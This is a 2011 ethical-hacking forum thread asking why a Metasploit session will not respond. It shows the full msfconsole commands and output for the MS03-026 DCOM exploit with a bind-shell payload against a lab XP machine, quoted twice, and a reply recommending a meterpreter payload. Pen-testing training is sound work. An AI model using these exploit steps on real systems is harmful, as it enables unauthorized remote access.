HomeCalendarCertificationsColumnsFeaturesForumResourcesVitals
 
Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.
Lost Password?
No account yet? Register
Who's Online
We have 82 guests and 1 member online
EH-Net News Feeds
Latest Additions
 
Advertisement

You are here: Home arrow Forum arrow Resourcesarrow Tutorialsarrow Help with Metasploit - Can't interact with open session on generic/shell_bind_tc
EH-Net
May 26, 2012, 03:34:45 AM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Advertise on EH-Net!! - Reasonable Rates, Highly Targeted Audience.
 
   Home   Help Calendar Login Register  
Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: Help with Metasploit - Can't interact with open session on generic/shell_bind_tc  (Read 5469 times)
0 Members and 1 Guest are viewing this topic.
kali8ula
Newbie
*
Offline Offline

Posts: 1


View Profile
« on: May 01, 2011, 03:16:03 AM »
Hi Guys,

Would appreciate some help on this one, ive been doing some pen testing with BT4 on an XP SP2 workstation, and these are the results I get when using generic/shell_bind_tcp payload.
it seems that it opens up a session, but there it gets stuck, I can't get into CMD or do anything...
last line I get is "
  • Starting interaction with 4..." (Full code below)
Would appreciate any responses.

Thanks!

Code:

msf> use exploit/windows/dcerpc/ms03_
026_dcom
msf exploit(ms03_026_dcom) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.209    yes       The target address
   RPORT  135              yes       The target port


Payload options (generic/shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  135              yes       The listen port
   RHOST  192.168.1.209    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal


msf exploit(ms03_026_dcom) > exploit -z

[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.209[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.209[135] ...
[*] Sending exploit ...
[*] Command shell session 4 opened (192.168.1.227:39153 -> 192.168.1.209:135) at Sat Apr 30 17:43:51 +0000 2011
[*] Session 4 created in the background.
msf exploit(ms03_026_dcom) > sessions -i 4
[*] Starting interaction with 4...
Logged
SephStorm
Sr. Member
****
Offline Offline

Posts: 416


View Profile WWW
« Reply #1 on: May 01, 2011, 04:08:13 PM »
Ive have similar issues when attacking W Vista and W7. I'm running under the assumption that the OS is actually patched.
Logged
Support my hactivities.
http://www.cafepress.com/TRUEHacker
xsurf
Newbie
*
Offline Offline

Posts: 13


View Profile
« Reply #2 on: May 02, 2011, 07:26:09 PM »
Hi,

Did you try with other payload ??
Logged
CCNA, SND
esojzuir
Newbie
*
Offline Offline

Posts: 7


View Profile
« Reply #3 on: May 02, 2011, 09:49:49 PM »
Quote from: kali8ula on May 01, 2011, 03:16:03 AM


Code:

msf> use exploit/windows/dcerpc/ms03_
026_dcom
msf exploit(ms03_026_dcom) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.209    yes       The target address
   RPORT  135              yes       The target port


Payload options (generic/shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  135              yes       The listen port
   RHOST  192.168.1.209    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal


msf exploit(ms03_026_dcom) > exploit -z

[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.209[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.209[135] ...
[*] Sending exploit ...
[*] Command shell session 4 opened (192.168.1.227:39153 -> 192.168.1.209:135) at Sat Apr 30 17:43:51 +0000 2011
[*] Session 4 created in the background.
msf exploit(ms03_026_dcom) > sessions -i 4
[*] Starting interaction with 4...

msf exploit(ms03_026_dcom) > exploit -z

The switch that you are using prevents you from interacting with any session after the exploit runs. Use exploit -h to see all options and you will find that -z prevents interaction. Also, why are you using generic bind? Use windows/meterpreter/bind_tcp which allows for full interaction with the victim, not just C:\ prompt.

I hope this helps.
Logged
Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.16 | SMF © 2011, Simple Machines
Joomla Bridge by JoomlaHacks.com 		Valid XHTML 1.0! Valid CSS!
Page created in 0.236 seconds with 22 queries.
 

gk_static-ad_feb2012.jpg
Global Knowledge: Build Security Skills to Protect & Defend

els_130x200fixed2.gif
eLearnSecurity Student Course Now Live!
5% Off with Code
ELS-EH-5

SANS Deals 4 EH-Netters
$150 OFF Any SANS Course in Any Format!
Coupon Code: EHN_Connect Including SANS Security West 2012 & SANSFIRE 2012
Recent Forum Topics

cbtnuggets_logo_125.jpg
Try CBT Nuggets Free!

Vote For EH-Net

Add to Technorati Favorites
technorati fave

 
         
Advertisement

© 2012 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.